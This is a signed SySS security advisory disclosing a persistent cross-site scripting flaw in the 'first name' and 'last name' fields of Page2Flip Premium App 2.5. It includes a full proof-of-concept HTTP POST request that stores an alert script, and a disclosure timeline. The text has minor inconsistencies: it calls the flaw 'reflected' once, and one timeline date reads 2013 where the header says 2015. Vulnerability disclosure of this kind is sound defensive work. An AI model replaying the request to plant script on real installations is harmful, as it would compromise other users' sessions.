-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-028
Product: Page2Flip
Vendor: w!ssenswerft GmbH
Affected Version(s): Premium App 2.5, probably also in Business App 
                     and Basic App, and in lower versions
Tested Version(s): Premium App 2.5
Vulnerability Type: Cross-Site Scripting (CWE-79) 
Risk Level: High
Solution Status: Open
Vendor Notification: 2015-06-29
Solution Date: 
Public Disclosure: 
CVE Reference: Not yet assigned
Author of Advisory: Dr. Erlijn van Genuchten (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

With the Page2Flip Web application, it is possible to create e-papers in
PDF format that can be flicked through digitally. Such e-papers can be
used for magazines, catalogues, flyers, etc. (see [1]).

The Page2Flip application is vulnerable to Persistent Cross-Site
Scripting so that administrative users can attack other administrative
users or users with fewer privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH identified a persistent cross-site scripting vulnerability
in the Page2Flip Premium App. 

At least the parameters "first name" and "last name" are not sanitized
sufficiently resulting in a persistent cross-site scripting
vulnerability. 

This reflected cross-site scripting vulnerability can be exploited in
the context of an authenticated user by storing script code in one of
these fields.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following HTTP POST request using the JavaScript code 
"<script>alert(1)</script>" as the value for the parameter "nachname"
demonstrates the persistent cross-site scripting vulnerability by
showing a JavaScript alert box as soon as this user has logged on:

POST /settings/users HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Content-Length: 1239
Cookie: <cookies>

accountEditForm=accountEditForm&javax.faces.ViewState=437392726575022409%3A-3508488346630943554&ice.window=9aib95sifa&ice.view=vvgml70d9&accountEditForm%3Aanrede=xxx&accountEditForm%3Avorname=xxx&accountEditForm%3Anachname=xxx%3Cscript%3Ealert(1)%3C%2Fscript%3E&accountEditForm%3Aemail=xxx&accountEditForm%3Apassword=xxx&accountEditForm%3Arights=ROLE_ADMINISTRATE_USER&accountEditForm%3Arights=ROLE_PUBLISH_DOCUMENTS&accountEditForm%3Arights=ROLE_CHANGE_SETTINGS&accountEditForm%3Arights=ROLE_CREATE_CUSTOMER&icefacesCssUpdates=&javax.faces.source=accountEditForm%3AsubmitBtn%3AsubmitBtn&javax.faces.partial.event=click&javax.faces.partial.execute=%40all&javax.faces.partial.render=%40all&ice.window=9aib95sifa&ice.view=vvgml70d9&ice.focus=accountEditForm%3AsubmitBtn%3AsubmitBtn&accountEditForm%3AsubmitBtn%3AsubmitBtn=Save&ice.event.target=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.captured=accountEditForm%3AsubmitBtn%3AsubmitBtn&ice.event.type=onclick&ice.event.alt=false&ice.ev
 ent.ctrl=false&ice.event.shift=false&ice.event.meta=false&ice.event.x=1281&ice.event.y=752&ice.event.left=true&ice.event.right=false&ice.submit.type=ice.s&ice.submit.serialization=form&javax.faces.partial.ajax=true


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-06-23: Vulnerability discovered
2013-06-29: Vulnerability reported to vendor
2015-07-07: Reported vulnerabilities again as the vendor did not respond 
            to the first e-mail
2015-07-14: Reminder sent concerning reported vulnerabilities
2015-08-24: Public release of security advisory according to the SySS
            Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Page2Flip homepage
    http://page2flip.de/
[2] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Erlijn van Genuchten of the
SySS GmbH.

E-Mail: erlijn.vangenuchten@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Erlijn_vanGenuchten.asc
Key ID: 0xBD96FF2A
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJV2x3sAAoJEAylhje9lv8qTP8QAK2z/18lni4UnWo3RElmM+/c
CiaqysnydDIvREm2Px36HQjeUDrYA35pZZhxi742E/flMhGw2/aH1gdVtmB6K7ai
qnIvStXOIMVul7IGhuHsOn+W7k7IfRx4726VGVoWNyUFoLmn5azU6/OqY+2ql6fH
rh/RfdKt8Lp2Q0KSdZy7Le3Il7hJX7YRoD8O/uECI7U2MtVwWJQg/zfK1y9+zFpP
Z7v55GMWRDZ4UWin6Fgps3ayVqdnmwUOo0R8xIkn9HU5j7S89QT+nRBE46FLO4ED
ZidsWxTeoUS75COcWsuCWVJXsse4KpdDSBVfIPoRG9OUU5s081OuDXHApZGYVlZb
lHlmVwjtyIGXUe5vecdCzjY4rk+C3nWwnr9Tew4QNtzg3NdPfugrpNeyBGFeVcu6
749ojAkzcGbFToEvbYBehBsbnNFq1DbUuLTkib+TCmM36/UZiZRZ9rnVS1T4e7Z3
r6fSlYVmFT19j4KfyucDvLv1XVsj4AJ77YI51xlRvnDEJkmQd3pvGfixZJ3n0Gse
eY9l7398jSzMMv+ePZ2eDWFomt23+tNODROy/ST9n15avYi2WlNb3aai86CdGnqZ
bstvEc7NTVyMotWmfYmbWidqMiCI4toB9ZAUMVlEUKTKMLQp6vUZe8lUiOpjNczE
0vOmqRgHRAff0wPtjo1I
=rzEs
-----END PGP SIGNATURE-----